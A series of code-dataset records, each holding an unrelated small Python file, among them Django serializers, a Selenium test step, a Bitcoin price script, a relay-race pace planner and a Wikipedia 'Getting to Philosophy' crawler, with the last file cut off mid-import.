    \"\r\n return html_str\r\n\r\n# with open(\"mem_info.html\",'w') as f:\r\n# f.write(html_str)","sub_path":"memory_info.py","file_name":"memory_info.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"550943370","text":"import allure\nfrom allure.constants import AttachmentType\nfrom Locators import media_page_locators\nfrom Steps import login_steps\nfrom Utils import params\nfrom selene.bys import *\nfrom selene.conditions import *\nfrom selene.tools import *\n\n\ndef add_media(driver, photo_path, **kwargs):\n try:\n login_steps.login_as_business(driver, email_address=params.email_value, password=params.password_value)\n s(by_link_text(media_page_locators.link_media)).click()\n with allure.MASTER_HELPER.step(\"Media page\"):\n allure.MASTER_HELPER.attach('screenshot', driver.get_screenshot_as_png(), type=AttachmentType.PNG)\n if kwargs.get('add_video'):\n s(media_page_locators.input_video).set(params.video_link)\n s(by_xpath(media_page_locators.button_link_video)).click()\n s(by_xpath(media_page_locators.link_add_photo)).should_be(clickable)\n with allure.MASTER_HELPER.step(\"Add video\"):\n allure.MASTER_HELPER.attach('screenshot', driver.get_screenshot_as_png(), type=AttachmentType.PNG)\n if kwargs.get('add_photo'):\n s(by_xpath(media_page_locators.link_add_photo)).click()\n s(media_page_locators.button_crop).click()\n with allure.MASTER_HELPER.step(\"Crop modal window\"):\n allure.MASTER_HELPER.attach('screenshot', driver.get_screenshot_as_png(), type=AttachmentType.PNG)\n s(media_page_locators.button_browse).set(photo_path)\n s(\"crop-loader-spinner\").should_not_be(visible)\n s(media_page_locators.button_crop).click()\n with allure.MASTER_HELPER.step(\"Added image in the Crop modal window\"):\n allure.MASTER_HELPER.attach('screenshot', driver.get_screenshot_as_png(), type=AttachmentType.PNG)\n s(by_xpath(media_page_locators.load_spinner)).should_not_be(visible)\n with allure.MASTER_HELPER.step(\"List of media\"):\n allure.MASTER_HELPER.attach('screenshot', driver.get_screenshot_as_png(), type=AttachmentType.PNG)\n # Delete media\n if kwargs.get('delete_video'):\n s(media_page_locators.video_player).hover().s(by_xpath(media_page_locators.remove_video)).click()\n if kwargs.get('delete_photo'):\n s(by_xpath(media_page_locators.photo_view)).hover().s(by_xpath(media_page_locators.remove_photo)).click()\n except AttributeError:\n with allure.MASTER_HELPER.step(\"Screen with error message\"):\n allure.MASTER_HELPER.attach('screenshot', driver.get_screenshot_as_png(), type=AttachmentType.PNG)\n","sub_path":"Steps/BuildStorefront/media_steps.py","file_name":"media_steps.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"83856604","text":"#!/usr/bin/env python3\nimport json\nfrom urllib.request import urlopen\n\nurlPrice = urlopen('https://www.bitstamp.net/api/ticker/').read()\nresultUrlPrice = json.loads(urlPrice)\ndollarPerBtc = float(resultUrlPrice['ask'])\n\nsatPerDollar = 100000000 / dollarPerBtc\n\nprint(\"Sats/Dollar : {:.0f}\".format(satPerDollar))\n","sub_path":"pythonscripts/satsperdollar.py","file_name":"satsperdollar.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"24445148","text":"from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\nfrom core.models import *\nfrom django.contrib.auth.models import *\nfrom rest_framework.exceptions import APIException\nfrom django.conf import settings\n# from rest_framework.validators import *\nfrom drf_extra_fields.fields import Base64ImageField # for image base 64\nfrom django.db import transaction, IntegrityError\nfrom master.models import TMasterModuleOther\n\nclass TCorePermissionsSerializer(serializers.ModelSerializer):\n cp_created_by = serializers.HiddenField(default=serializers.CurrentUserDefault())\n class Meta:\n model = TCorePermissions\n fields = ('id','cp_u','cp_g', 'cp_o','cp_created_by')\n\n # def create(self, validated_data):\n # permissions = super(TCorePermissionsSerializer, self).create(validated_data)\n # permissions.save()\n # return permissions\nclass TCoreModuleSerializer(serializers.ModelSerializer):\n \"\"\"docstring for ClassName\"\"\"\n # cm_icon = Base64ImageField()\n cm_created_by = serializers.HiddenField(default=serializers.CurrentUserDefault())\n # cm_name = serializers.CharField(required=True)\n # cm_url = serializers.CharField(required=True)\n class Meta:\n model = TCoreModule\n fields = ('id','cm_name', 'cm_icon','cm_desc','cm_url','cm_permissions', 'cm_created_by', 'cm_is_editable')\nclass TCoreModuleListSerializer(serializers.ModelSerializer):\n \"\"\"docstring for ClassName\"\"\"\n # cm_icon = Base64ImageField() \n cm_permissions = TCorePermissionsSerializer()\n class Meta:\n model = TCoreModule\n fields = ('id','cm_name', 'cm_icon','cm_desc','cm_url','cm_permissions')\nclass TCoreRoleSerializer(serializers.ModelSerializer):\n \"\"\"docstring for ClassName\"\"\"\n cr_created_by = serializers.HiddenField(default=serializers.CurrentUserDefault())\n class Meta:\n model = TCoreRole\n fields = ('id','cr_name', 'cr_parent_id', 'cr_created_by')\nclass UnitAddSerializer(serializers.ModelSerializer):\n c_created_by = serializers.CharField(default=serializers.CurrentUserDefault())\n c_owned_by = serializers.CharField(default=serializers.CurrentUserDefault())\n\n class Meta:\n model = TCoreUnit\n fields = ('id', 'c_name', 'c_created_by', 'c_owned_by')\n#:::::::::::::::: OBJECTS :::::::::::::#\nclass OtherAddSerializer(serializers.ModelSerializer):\n cot_created_by = serializers.CharField(default=serializers.CurrentUserDefault())\n parent_id = serializers.IntegerField(required=False)\n mmo_module = serializers.CharField(required=False)\n class Meta:\n model = TCoreOther\n fields = ('id','cot_name','description','parent_id','cot_created_by','mmo_module')\n def create(self, validated_data):\n try:\n cot_created_by = validated_data.get('cot_created_by')\n parent_id = validated_data.pop('parent_id') if 'parent_id' in validated_data else 0\n with transaction.atomic():\n cot_save_id = TCoreOther.objects.create(\n cot_name=validated_data.get('cot_name'),\n description=validated_data.get('description'),\n cot_created_by=cot_created_by,\n )\n master_module = TMasterModuleOther.objects.create(\n mmo_other = cot_save_id,\n mmo_module_id = validated_data.get('mmo_module'),\n parent_id = parent_id\n )\n response = {\n 'id': cot_save_id.id,\n 'cot_name': cot_save_id.cot_name,\n 'description': cot_save_id.description,\n 'mmo_module':master_module.mmo_module,\n 'parent_id':master_module.parent_id\n }\n return response\n except Exception as e:\n raise e\nclass OtherListSerializer(serializers.ModelSerializer):\n parent_name = serializers.CharField(required=False)\n class Meta:\n model = TMasterModuleOther\n fields = ('id','mmo_other','mmo_module','parent_id','is_deleted','parent_name')\nclass OtherEditSerializer(serializers.ModelSerializer):\n cot_updated_by = serializers.CharField(default=serializers.CurrentUserDefault())\n parent_id = serializers.IntegerField(required=False)\n mmo_module = serializers.CharField(required=False)\n class Meta:\n model = TCoreOther\n fields = ('id', 'cot_name', 'description', 'parent_id', 'cot_updated_by', 'mmo_module')\n\n def update(self, instance, validated_data):\n try:\n print('validated_data',validated_data)\n cot_updated_by = validated_data.get('cot_updated_by')\n parent_id = validated_data.pop('parent_id') if 'parent_id' in validated_data else 0\n with transaction.atomic():\n instance.cot_name = validated_data.get('cot_name')\n instance.description = validated_data.get('description')\n instance.cot_updated_by = cot_updated_by\n instance.save()\n\n TMasterModuleOther.objects.filter(mmo_other=instance.id).delete()\n master_module = TMasterModuleOther.objects.create(\n mmo_other = instance,\n mmo_module_id = validated_data.get('mmo_module'),\n parent_id = parent_id\n )\n response = {\n 'id': instance.id,\n 'cot_name': instance.cot_name,\n 'description': instance.description,\n 'mmo_module':master_module.mmo_module,\n 'parent_id':master_module.parent_id\n }\n return response\n except Exception as e:\n raise e\nclass OtherDeleteSerializer(serializers.ModelSerializer):\n cot_updated_by = serializers.CharField(default=serializers.CurrentUserDefault())\n updated_by = serializers.CharField(default=serializers.CurrentUserDefault(),required=False)\n parent_id = serializers.IntegerField(required=False)\n mmo_module = serializers.CharField(required=False)\n is_deleted = serializers.CharField(required=False)\n class Meta:\n model = TCoreOther\n fields = ('id', 'cot_name', 'description', 'parent_id', 'cot_updated_by',\n 'mmo_module','updated_by','is_deleted')\n\n def update(self, instance, validated_data):\n try:\n cot_updated_by = validated_data.get('cot_updated_by')\n updated_by = validated_data.get('updated_by')\n instance.cot_is_deleted = True\n instance.cot_updated_by = cot_updated_by\n instance.save()\n #print('instance',instance)\n module_other = TMasterModuleOther.objects.filter(mmo_other=instance)\n #print('ModuleOther',module_other.query)\n for e_module_other in module_other:\n e_module_other.is_deleted = True\n e_module_other.updated_by = updated_by\n e_module_other.save()\n return instance\n except Exception as e:\n raise e","sub_path":"core/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":7117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"542377180","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n# author: wangyadong\n\"\"\"\nnames = [\"wangyadong\", \"wuqing\", \"taoyake\", \"meizi\"]\nname2 = [1,2,3,4]\nprint(names)\nnames.append(\"lvyang\")\nprint(names)\nnames.insert(1,\"wangjian\")\nprint(names)\nnames.remove(\"wangjian\")\nprint(names)\nnames.pop()\nprint(names)\nprint(names.count(\"wuqing\"))\nnames.reverse()\nprint(names)\nnames.extend(name2)\nprint(names)\nprint(names.index(\"taoyake\"))\n\"\"\"\n\n\"\"\"\nimport copy\n\na = [\"wang\", \"li\", \"jun\", [\"tian\", \"xia\"]]\nb = copy.deepcopy(a)\nprint(a)\nprint(b)\na[3][0] = \"di\"\nprint(a)\nprint(b)\nprint(a[0:-1:2])\n\nfor i in a:\n print(i)\n\"\"\"\n\nimport copy\n\npersion=['name', ['saving', 100]]\n\np1=copy.copy(persion)\np2=persion[:]\np3=list(persion)\n\np4=persion[:]\np5=persion[:]\nprint(p4)\nprint(p5)\np4[0]='wang'\np5[0]='li'\npersion[1][1]=200\nprint(p4)\nprint(p5)","sub_path":"date 2/new_dir/names_test.py","file_name":"names_test.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"154803798","text":"qs = ['请输入你姓名\\n',\r\n '请输入你电话\\n',\r\n '请输入你身份证\\n',\r\n '输入电话号码前三位乘以身份证前三位即可退出\\n']\r\nn = 0\r\ni = 1\r\nwhile True:\r\n a = input(qs[n])\r\n if a == '188*411'or a == '7708':\r\n print('恭喜你答对了')\r\n break\r\n n = (n+1) %4\r\n print('按q键退出')\r\n i = i +1\r\n if i>20:\r\n continue\r\n\r\n\r\n","sub_path":"tstp/文字游戏.txt.py","file_name":"文字游戏.txt.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"384047746","text":"# # You will have to figure out what parameters to include\n# # 🚨 All functions must use recursion 🚨`\n\n# # This function returns an array of all possible outcomes from flipping a coin N times.\n# # Input type: Integer \n# # H stands for Heads and T stands for tails\n# # Represent the two outcomes of each flip as \"H\" or \"T\"\n\n# def coin_flips(n):\n# # Write code here\n# pass\n\n# # print(coinFlips(2)) \n# # => [\"HH\", \"HT\", \"TH\", \"TT\"]\n\n# Current starts with empty string\n# Begin with empty results\ndef addFlips(n, result=[], current=''):\n if (n == 1): \n # This is the last flip, so add the result to the array\n result.append(current + 'H')\n result.append(current + 'T')\n else: \n # Let's say current is TTH (next combos are TTHH and TTHT)\n # Then for each of the 2 combos call add Flips again to get the next flips.\n addFlips(n - 1, result, current + 'H')\n addFlips(n - 1, result, current + 'T')\n return result\n\nprint(addFlips(1))","sub_path":"coin_flips.py","file_name":"coin_flips.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"478045239","text":"import os, re\nimport pandas as pd\nfrom config import config\nfrom nltk.tokenize import sent_tokenize\n\nnounPath = \".\" + os.sep + config[\"website\"] + os.sep + config[\"product\"] + \"_NOUN\" + \".csv\"\nnoundf = pd.read_csv(nounPath, usecols=[\"title_body\", \"selected\" ,\"key\"])\n\nemoPath = \".\" + os.sep + config[\"website\"] + os.sep + config[\"product\"] + \"_EMOTION\" + \".csv\"\nemodf = pd.read_csv(emoPath, usecols=[\"title_body\", \"selected\" ,\"key\"])\n\nintersectdf = pd.concat([noundf[\"title_body\"], noundf[\"key\"]], axis=1, keys=[\"title_body\", \"key\"])\n\nnoun_sentences = noundf[\"selected\"].fillna(\"\").apply(sent_tokenize)\nemo_sentences = emodf[\"selected\"].fillna(\"\").apply(sent_tokenize)\nintersect_sentences = []\nfor n_s, emo_s in zip(noun_sentences, emo_sentences):\n intersect = [s for s in n_s if s in emo_s]\n intersect_sentences.append(\" \".join(intersect))\nintersectdf[\"intersect\"] = intersect_sentences\n\n# Rearrange column order\nintersectdf = intersectdf[[\"title_body\", \"intersect\", \"key\"]]\n\n# Write to csv\noutputPath = \".\" + os.sep + config[\"website\"] + os.sep + config[\"product\"] + \"_INTERSECT.csv\"\nintersectdf.to_csv(outputPath, encoding='utf-8', index=False)","sub_path":"senti_noun_intersect.py","file_name":"senti_noun_intersect.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"538436814","text":"from pynput.keyboard import Key, Controller\nimport time\n\ndef keys(sent, delay):\n keyboard = Controller()\n for char in sent:\n if char == \";\":\n time.sleep(delay)\n else:\n keyboard.press(char)\n keyboard.release(char)\nwhile True:\n ns = input(\"Notes: \")\n time.sleep(5)\n keys(ns, 0.2)\n","sub_path":"Playnotes.py","file_name":"Playnotes.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"610148519","text":"from Goap.Action import Actions\nfrom Goap.Agent import Agent\n\n\nclass DeploymentAgent:\n\n PRIORITIES = [\n {'vpc': True, 'db': True, 'app': True},\n {'vpc': 'monitoring', 'db': 'monitoring', 'app': 'monitoring'},\n ]\n\n def __init__(self):\n # ACTIONS\n self.actions = Actions()\n # update app\n self.actions.add_action(\n name='UpdateApp',\n pre_conditions={'vpc': True, 'db': True, 'app': 'version_out_of_date'},\n effects={'vpc': True, 'db': True, 'app': True}\n )\n # rollback change\n self.actions.add_action(\n name='RollbackApp',\n pre_conditions={'vpc': True, 'db': True, 'app': 'need_rollback'},\n effects={'vpc': True, 'db': True, 'app': True}\n )\n # init_state = {'vpc': False, 'app': False, 'db': False}\n init_goal = {'vpc': True, 'db': True, 'app': True}\n self.ai = Agent(name='CloudBuilder', actions=self.actions, goal=init_goal)\n\n def run_agent(self):\n self.ai.run()\n\n\nif __name__ == '__main__':\n ai = PerformanceTracker()\n ai.run_agent()\n\n\n","sub_path":"examples/deployer.py","file_name":"deployer.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"351746586","text":"from django.urls import path\nfrom .views import(\nStudentCrearteAPIView,\nStudentRetriveAPIView,\nStudentUpdateAPIView,\nStudentListAPIView,\nStudentDestroyAPIView,\n)\n\nurlpatterns = [\n path('api/',StudentListAPIView.as_view(),name='list'),\n path('create',StudentCrearteAPIView.as_view(),name='create'),\n path('',StudentRetriveAPIView.as_view(),name='details'),\n path('/update',StudentUpdateAPIView.as_view(),name='update'),\n path('/delete',StudentDestroyAPIView.as_view(),name='delete'),\n\n]\n","sub_path":"studentapi/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"647372887","text":"\n# The simplest impossible math problem\n\n\ndef collatz(n):\n if n % 2 == 0:\n n=n//2\n # print(n)\n return n\n\n elif n % 2 == 1:\n n = 3 * n + 1\n # print(n)\n return n\n\ntry:\n number = int(input(\"Enter the number :\"))\n\n while number != 1:\n number = collatz(number)\n print(number)\n\nexcept ValueError:\n print(\"Enter a valid number!\")\n\n\n# No matter what the number is, the answer will evantually be 1.\n","sub_path":"collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"457215781","text":"#!/usr/bin/env python3\nfrom __future__ import (absolute_import, division, print_function)\n\nimport json\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\n### plotly\nfrom plotly import tools as toolsly\nfrom plotly.offline import plot\nimport plotly.graph_objs as go\n### matplotlib\n#import matplotlib\n#import matplotlib.pyplot as plt\n#plt.xkcd()\n\n# location of the script\nimport os\nimport sys\nscriptdir = os.path.split(os.path.abspath(sys.argv[0]))[0]\ndocsdir = os.path.abspath(os.path.join(scriptdir, '../docs/races/2017/BlueRidgeRelay/'))\nprint('Script located', scriptdir)\nprint('Data and output to', docsdir)\nRATINGS = {0:'UNKNOWN',\n 1:'easy',\n 2:'moderate',\n 3:'hard',\n 4:'very hard',\n 5:'mountain goat'}\n\ndef deltaTimeToStr(diff):\n symbol = '-'\n if diff.days < 0:\n symbol = '+'\n diff = str(diff).split(' ')[-1]\n diff = [int(value) for value in diff.split(':')[:2]]\n if symbol == '+':\n diff = abs(60*(diff[0]-24)+diff[1])-1\n diff = [int(diff / 60), diff % 60]\n return '%s%dh%02dm' % (symbol, diff[0], diff[1])\n\n######################################################################\n############################## calculate everything\n# TODO read in legs.json\n# ratings: 1:easy, 2:moderate, 3:hard, 4:very hard, 5:mountain goat\nlegs = pd.read_json(os.path.join(docsdir, 'legs.json'))\n#print(legs)\nlegs['number'] = legs['number'].astype(int)\nprint('the race is', legs['miles'].size, 'for', legs['miles'].sum(), 'miles')\n'''\n# setup list of legs\nlegs = np.array([4.5, 5.4, 5.5])\n#print('short', legs)\nlegs_full = np.tile(legs,8)\nlegs_ultra = legs_full[:12]+legs_full[1:13]\nlegs_full = np.insert(legs_full, 0, 0.)\nlegs_ultra = np.insert(legs_ultra, 0, 0.)\n#print('full ', legs_full, legs_full.size, legs_full.sum())\n#print('ultra', legs_ultra, legs_ultra.size, legs_ultra.sum())\n'''\n\n# setup list of all runners\nrunner = np.arange(9)+1 # team of nine this time\n#runner = np.repeat(runner,2) # uncomment for double legs\nrunner = np.tile(runner,int(legs['miles'].size)//runner.size) # everybody runs the same number\n\nrunner = np.insert(runner, 0, 0) # get a slot for the time\n#print('runner', runner, runner.size)\n\n# add the zeroth leg to give start time\nlegs = legs.append({\"number\":0, \"miles\":0.0, \"rating\":0, \"gain\":0, \"loss\":0},\n ignore_index=True)\nlegs['number'] = legs['number'].astype(int)\nlegs = legs.sort_values(by='number')\n# legs = legs.set_index('number') # must be a better way\n#print(legs)\n\n# accumulate a list of distances\nrace = pd.DataFrame({'leg':legs['number'],\n 'distance':legs['miles'],\n 'runner': runner,\n })\nrace['distance_accum'] = np.add.accumulate(race['distance'])\nrace = race.set_index('leg') # must be a better way\n#print(race)\n# debug matplotlib plot\n#fig, axes = plt.subplots()\n#axes.plot(np.arange(legs_full.size)+1, np.add.accumulate(legs_full), label='full')\n#axes.plot(np.arange(legs_ultra.size)+1, np.add.accumulate(legs_ultra), label='ultra')\n#axes.legend()\n\n############################## GOOD UP TO THIS POINT\n\n# setup times for runners\nrunners = pd.DataFrame({'runner':np.arange(10),\n 'name':['NA', 'Mike', 'Ryan', 'Peter', 'Dan', 'Pete',\n 'Gerland', 'Kevin', 'Carlo', 'David'],\n 'pace':[np.timedelta64(int(0), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's'),\n np.timedelta64(int(8.5*60), 's')]})\nrunners = runners.set_index('runner') # must be a better way\n#print(runners)\n\n# sunrise/sunset taken from https://www.timeanddate.com/sun/usa/atlanta\nwith open(os.path.join(docsdir, 'annotations.json'), 'r') as handle:\n config = json.load(handle)\n for item in config['annotations']:\n key = list(item.keys())[0]\n item[key] = np.datetime64(item[key])\n\n# calculate the leg times for the actual races\ntime_error = np.timedelta64(int(30), 's')\ntime_zero = np.timedelta64(int(0), 's')\nleg_time = []\nleg_time_fast = []\nleg_time_slow = []\nfor index, row in race.iterrows():\n if row.runner == 0:\n leg_time.append(time_zero)\n leg_time_fast.append(time_zero)\n leg_time_slow.append(time_zero)\n else:\n leg_time.append(row.distance*runners.loc[row.runner].pace)\n leg_time_fast.append(row.distance*(runners.loc[row.runner].pace-time_error))\n leg_time_slow.append(row.distance*(runners.loc[row.runner].pace+time_error))\nrace['time'] = leg_time\nrace['time_fast'] = leg_time_fast\nrace['time_slow'] = leg_time_slow\nrace['time_accum'] = np.add.accumulate(race['time'])\nrace['time_accum_fast'] = np.add.accumulate(race['time_fast'])\nrace['time_accum_slow'] = np.add.accumulate(race['time_slow'])\n#print(race)\n\n# set a start time and calculate when the magic happens\ntime_start = np.datetime64('2017-09-08T08:30')\nfor label in ['time_accum', 'time_accum_fast', 'time_accum_slow']:\n race[label] = [ time_start+time_accum for time_accum in race[label]]\n#print(race)\n\n# load in the actual times\nwith open(os.path.join(docsdir,'actual.json'), 'r') as handle:\n actual = json.load(handle)\n actual = [np.datetime64(item) for item in actual]\nwhile len(actual) < legs['miles'].size: # pad out with None for the rest\n actual.append(None)\nlegs = legs.set_index('number') # must be a better way\n#print(legs)\n\n# calculate new updated estimated times\nest_updating = actual[:]\nfor i, _ in enumerate(est_updating):\n if i == 0:\n continue\n if est_updating[i] is not None:\n continue\n est_updating[i] = est_updating[i-1] + race.time[i]\n# add the finish time\nest_updating.append(est_updating[-1] + race.time[race.time.size-1])\n#print(race)\n\n######################################################################\n############################## put together the json document\n#leg_descr = {0:'gre/yel',\n# 1:'red/gre',\n# 2:'yel/red'}\n#leg_miles = {0:legs[0]+legs[1],\n# 1:legs[2]+legs[0],\n# 2:legs[1]+legs[2]}\njson_data = []\nfor index, row in race.iterrows():\n #print(index, row)\n #if index%2 != 0: # it is an ultra\n # continue\n if index == 0:\n continue\n\n runner = ''\n if row.runner != 0:\n runner = runners.loc[row.runner]['name']\n\n #leg_type = int(row.leg/2-1)%3\n\n start = race.iloc[index-1]['time_accum']\n real = actual[index-1]\n if real is None:\n real = ''\n else:\n real = real.astype(datetime)\n if real is None:\n real = ''\n else:\n diff = deltaTimeToStr(start - real)\n real = '%s (%s)' % (real.strftime('%H:%M'), diff)\n start = race.iloc[index-1]['time_accum'].strftime('%H:%M')\n\n time = str(row['time']).split(' ')[-1]\n time = 'h'.join(time.split(':')[:2]) + 'm'\n\n json_data.append({'leg':int(index), \n 'runner':runner,\n 'descr':RATINGS[legs.iloc[index]['rating']],\n 'miles':legs.iloc[index]['miles'],#leg_miles[leg_type],\n 'start':start,\n 'elapse':time, # TODO something wrong here!!!!!!\n 'actual':real})\n\n# add the finish time\nrow = race.iloc[race.distance_accum.size-1]\nstart = row['time_accum']\nreal = actual[-1]\nif real is None:\n real = ''\nelse:\n diff = deltaTimeToStr(start - real)\n real = '%s (%s)' % (real.astype(datetime).strftime('%H:%M'), diff)\nstart = row['time_accum'].strftime('%H:%M')\n\njson_data.append({'leg':int(race.distance_accum.size),\n 'runner':'',\n 'descr':'finish',\n 'miles':'',\n 'start':start, # todo\n 'elapse':'',\n 'actual':real}) # todo\n\n# write out the json doc\n#print(json.dumps(json_data, indent=2))\nwith open(os.path.join(docsdir, 'data.json'), 'w') as handle:\n json.dump(json_data, handle, sort_keys=True)\n\n######################################################################\n############################## generate the plotly plot\nplotly_args = {'filename': os.path.join(docsdir, 'plot.html'),\n 'auto_open':False,\n #'output_type': 'div',\n #'include_plotlyjs': False\n }\n\n# define various useful colors\ncolor = dict(cone='#aaaaaa',\n predicted='#555555',\n actual='#7777ff',\n easy='#bbfb9d',\n medium='#fbf59b',\n hard='#fbae9d')\n\n# bounding box\ndistance_bounds = [race.distance_accum[0], race.distance_accum[race.distance_accum.size-1]]\ntime_bounds = [race.time_accum_slow[0], race.time_accum_slow[race.distance_accum.size-1]]\n\n# race distance array\ndistance = race['distance_accum']\n\ndef genDiffValues(distance, tileArray, firstArray):\n y = np.array(tileArray)\n num_tile = int(distance.size/y.size)\n if firstArray is not None:\n num_tile += 1\n y = np.tile(y, num_tile)\n if firstArray is not None:\n y[:len(firstArray)]\n return y\n\ndef difficulties(distance, color, tileArray, firstArray=None):\n y = genDiffValues(distance, tileArray, firstArray)\n\n return go.Scatter(x=distance,\n y=y,\n line=dict(shape='spline', color=color, width=20),\n mode='lines',\n hoverinfo='skip',\n showlegend=False)\n\n\ndata = []\n\n# color bar for difficulties of doubles\n'''\nsingles_pos = race.time_accum[0]\ndoubles_pos = race.time_accum[race.distance_accum.size-1]\n\nfor position, x in zip([singles_pos, doubles_pos], [distance, race['distance_accum']]):\n data.append(difficulties(x, color['easy'],\n [position, position, None]))\n data.append(difficulties(x, color['medium'],\n [None, position, position]))\n data.append(difficulties(x, color['hard'],\n [position, None, position],\n [None, None, position]))\n'''\n\n# prediction cone\nfast = go.Scatter(x=distance,\n y=race['time_accum_fast'],\n name='fast',\n line=dict(shape='spline', color='transparent'),\n mode='lines',\n showlegend=False,\n hoverinfo='skip',\n fill='tonextx',\n fillcolor=color['cone'])\n\nslow = go.Scatter(x=distance,\n y=race['time_accum_slow'],\n name='slow',\n line=dict(shape='spline', color='transparent'),\n mode='lines',\n hoverinfo='skip',\n showlegend=False)\n\n# predicted line\npred_text = []\nactual_text = []\n# leg is the index\nfor x, y, leg, runner, act, est in \\\n zip(distance, race['time_accum'], race.index.tolist(), race['runner'], actual, est_updating):\n #leg_type = leg%3\n #leg = int((leg+1)/2)+1\n runner = runners.iloc[runner]['name']\n\n diff = deltaTimeToStr(y-est)\n\n text = ''\n if act is not None:\n actual_text.append(diff)\n else:\n text = str(est).split(' ')[-1]\n text = ':'.join(text.split(':')[:2])\n text += ' (%s)
    ' % diff\n text += 'leg %d - %.1f miles' % (leg, legs.iloc[leg]['miles'])\n text += '
    %s - %s' % (runner, RATINGS[legs.iloc[leg]['rating']])\n\n pred_text.append(text)\npred_text.append('finish')\nprediction = go.Scatter(x=distance,\n y=race['time_accum'],\n text=pred_text,\n name='prediction',\n line=dict(shape='spline', color=color['predicted'], width=2),\n mode='lines',\n showlegend=False)\n\n# get rid of unstated actual times\nactual = [item for item in actual\n if item is not None]\n\nest_updating = go.Scatter(x=distance[len(actual)-1:],\n y=est_updating[len(actual)-1:],\n name='estimated',\n line=dict(shape='spline', color=color['actual'], width=2, dash='dash'),\n mode='lines',\n hoverinfo='skip',\n showlegend=False)\n\n# actual times\nactual = go.Scatter(x=distance[:len(actual)],\n y=actual,\n text=actual_text,\n name='actual',\n line=dict(shape='spline', color=color['actual'], width=2),\n mode='lines',\n #hoverinfo='skip',\n showlegend=False)\n\n\n# add some annotations\nannotation_symbols = dict(sunrise='\\u263C sunrise',\n sunset='\\u263D sunset')\nannotations = []\nfor item in config['annotations']:\n key = list(item.keys())[0]\n label = annotation_symbols.get(key, key)\n if item[key] > time_bounds[0] and item[key] < time_bounds[-1]:\n annotations.append(dict(x=0, y=item[key], text=label, showarrow=False, xanchor='left'))\n\n# put together the final plot\nlayout = go.Layout(xaxis={'title': 'miles',\n 'showgrid':False,'showline':False},\n yaxis={'showgrid':False,'showline':False,\n 'zeroline':False},\n margin={'r':0,'t':0},\n annotations=annotations\n)\ndata.extend([slow,fast,prediction,est_updating, actual])\nfig = go.Figure(data=data,\n layout=layout)\nplot(fig, show_link=False, **plotly_args)\n","sub_path":"python/BlueRidgeRelay2017.py","file_name":"BlueRidgeRelay2017.py","file_ext":"py","file_size_in_byte":13912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"356231643","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 18 13:22:40 2019\n\n@author: rehab\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport time \nimport urllib\n\ncount=0\nstart_url=\"https://en.wikipedia.org/wiki/Special:Random \"\n\n\ndef get_first_link(url):\n global count\n _page=requests.get(url)\n soup = BeautifulSoup(_page.content, 'html.parser')\n content=soup.find(id=\"mw-content-text\").find(class_=\"mw-parser-output\")\n #print(content)\n \n link=None\n for element in content.find_all(\"p\",recursive=False):\n if element.find(\"a\",recursive=False):\n link=element.find(\"a\",recursive=False).get('href')\n break\n count+=1 \n \n return link\n \n\nlinks=[]\ndef getting_Philosophy(start_url):\n first_link=get_first_link(start_url)\n \n #time.sleep(.5)\n if first_link ==None:\n print(\"there is no wiki links\")\n elif count >50:\n print(\"stuck in a loop , search aborted\")\n \n else:\n link=urllib.parse.urljoin(\"https://en.wikipedia.org\", first_link)\n links.append(link)\n print(link)\n time.sleep(.5)\n page=requests.get(link)\n soup = BeautifulSoup(page.content, 'html.parser')\n if links[-1] in links[:-1]:\n print(\"Arrived at an article already seen\")\n \n \n elif soup.find(id=\"firstHeading\").text == \"Philosophy\" :\n print(\"Philosophy page is reached\")\n \n else:\n getting_Philosophy(link)\n \n \ngetting_Philosophy(start_url) \n\n\n\n\n \n ","sub_path":"getting_Philosophy.py","file_name":"getting_Philosophy.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"68495861","text":"from enum import Enum\nimport concurrent.futures\nimport logging # pylint: disable=C0302\nfrom functools import cmp_to_key\nfrom flask import Blueprint, request\nimport sqlalchemy\n\nfrom src import api_helpers, exceptions\nfrom src.queries.search_config import (\n search_title_weight,\n user_name_weight,\n search_similarity_weight,\n search_repost_weight,\n 